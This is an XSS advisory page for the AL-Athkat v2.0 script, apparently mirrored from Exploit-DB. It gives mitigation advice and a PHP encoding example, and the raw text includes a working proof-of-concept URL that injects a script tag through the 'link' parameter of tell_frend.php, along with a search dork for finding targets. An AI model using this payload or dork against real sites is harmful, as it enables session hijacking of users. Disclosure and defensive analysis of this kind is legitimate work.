vendor: AL-Athkat.v2.0
by: indoushka
CVSS: 7,5 (HIGH)
CWE: 79 (XSS)
Product Name: AL-Athkat.v2.0
Affected Version From: AL-Athkat.v2.0
Affected Version To: AL-Athkat.v2.0
Patch Exists: N/A
Related CWE: N/A
CPE: AL-Athkat.v2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
2009

AL-Athkat.v2.0 Cross Site Scripting Vulnerability

A Cross-Site Scripting (XSS) vulnerability was discovered in AL-Athkat.v2.0. An attacker can exploit this vulnerability to inject malicious JavaScript code into the vulnerable application. This code will be executed in the browser of the victim when the vulnerable page is accessed. The malicious code can access any cookies, session tokens, or other sensitive information retained by the browser and used with the vulnerable application. This may lead to the attacker taking control of the affected user's session.

Mitigation:

Input validation can be used to prevent XSS attacks. All user-supplied input should be validated and filtered for malicious content. Additionally, output encoding should be used to prevent malicious content from being interpreted as code by the browser.
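
One way to apply both controls to the `link` parameter that appears in the request quoted in the raw data, shown as an added example and not AL-Athkat's own code. The source of `tell_frend.php` is not on this page, so the textarea layout and the helper names `validate_link`, `h` and `render_link_field` are assumptions.

```php
<?php
// Added example, not AL-Athkat source: the real tell_frend.php is not shown
// on this page, so the form layout and helper names here are assumptions.

// Validation: accept the `link` value only if it is an absolute http(s) URL
// of reasonable length; anything else is replaced by an empty string.
function validate_link(string $raw): string
{
    $raw = trim($raw);
    if ($raw === '' || strlen($raw) > 2048) {
        return '';
    }
    if (filter_var($raw, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($raw, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $raw : '';
}

// Output encoding: escape for HTML text/attribute context so that <, >, &
// and both quote characters are emitted as entities and cannot close the
// surrounding <textarea> or open a new tag. This runs on every value,
// including ones that passed validation.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the (hypothetical) textarea that echoes the link back to the user.
function render_link_field(string $rawLink): string
{
    return '<textarea name="link" rows="3" cols="40">'
        . h(validate_link($rawLink))
        . '</textarea>';
}

// Constructed inputs: a normal link, and a value that tries to close the
// textarea and start a script element.
$samples = [
    'http://server/page.php?id=1&lang=ar',
    '</textarea><script>alert(1)</script>',
];
foreach ($samples as $s) {
    echo render_link_field($s), PHP_EOL;
}
```

Validation narrows what is accepted, but the encoding step is what keeps a reflected value inert in the page, so it is applied at output time regardless of the validation result.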

Exploit-DB raw data:

========================================================================================                  
| # Title    : AL-Athkat.v2.0 Cross Site Scripting Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 1                                                
|                High  : 1                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
                                                                    
| # Dork     : script AL-Athkat.v2.0 ÓßÑíÈÊ ÇáÃÐßÇÑ v2.0                            
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS

http://server/tell_frend.php?name=indoushka&email=indoushka%40hotmaill%2Ecom&name1=tchalla06@yahoo.fr&email1=Hussin-x&submitok=1&link=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>


================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
-------------------------------------------------------------------------------------------